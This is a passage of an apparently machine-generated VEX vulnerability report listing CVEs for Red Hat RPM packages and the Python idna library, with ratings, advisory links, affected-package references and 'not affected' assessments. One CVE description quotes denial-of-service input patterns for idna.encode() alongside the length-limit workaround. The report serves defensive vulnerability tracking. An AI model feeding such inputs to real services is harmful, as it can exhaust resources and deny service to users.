          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-44605",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in the RPM Package Manager (RPM). A local user could be affected by a heap buffer overflow vulnerability when processing a specially crafted NDB database file. This issue arises from an error in how RPM handles certain calculations during file parsing, leading to an incorrect memory allocation. An attacker could leverage this to cause a denial of service, making the system unavailable.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-44605"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33507"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-44605"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482481"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44605"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44605"
        }
      ],
      "published": "2026-08-05T18:17:11+00:00",
      "updated": "2026-08-06T15:37:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "4.16.1.3-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-45409",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1333
      ],
      "description": "Internationalized Domain Names in Applications (IDNA) for Python provides support for Internationalized Domain Names in Applications (IDNA) and Unicode IDNA Compatibility Processing. In versions prior to 3.15, payloads such as `\"\\u0660\" * N` or `\"\\u30fb\" * N + \"\\u6f22\"` utilize the `valid_contexto` function prior to length rejection, and for high values of `N` will take a long time to process. This is the same issue as CVE-2024-3651, however the original remediation in 2024 was not a complete fix. A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. Starting in version 3.14, the function rejects long inputs as soon as practicable prior to any further processing to minimize resource consumption. In version 3.15, this approach was extended to lesser used alternate functions (i.e. per-label conversions and codec support). A workaround is available. Domain names cannot exceed 253 characters in length. If this length limit is enforced prior to passing the domain to the `idna.encode()` function, it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-45409"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54290"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54484"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-45409"
        },
        {
          "url": "https://bugzilla.redhat.com/2485616"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2485616"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45409"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-54484.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:54290"
        },
        {
          "url": "https://github.com/kjd/idna"
        },
        {
          "url": "https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2026-215.yaml"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-45409.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-54484.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45409"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8549-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45409"
        }
      ],
      "published": "2026-06-05T23:16:43+00:00",
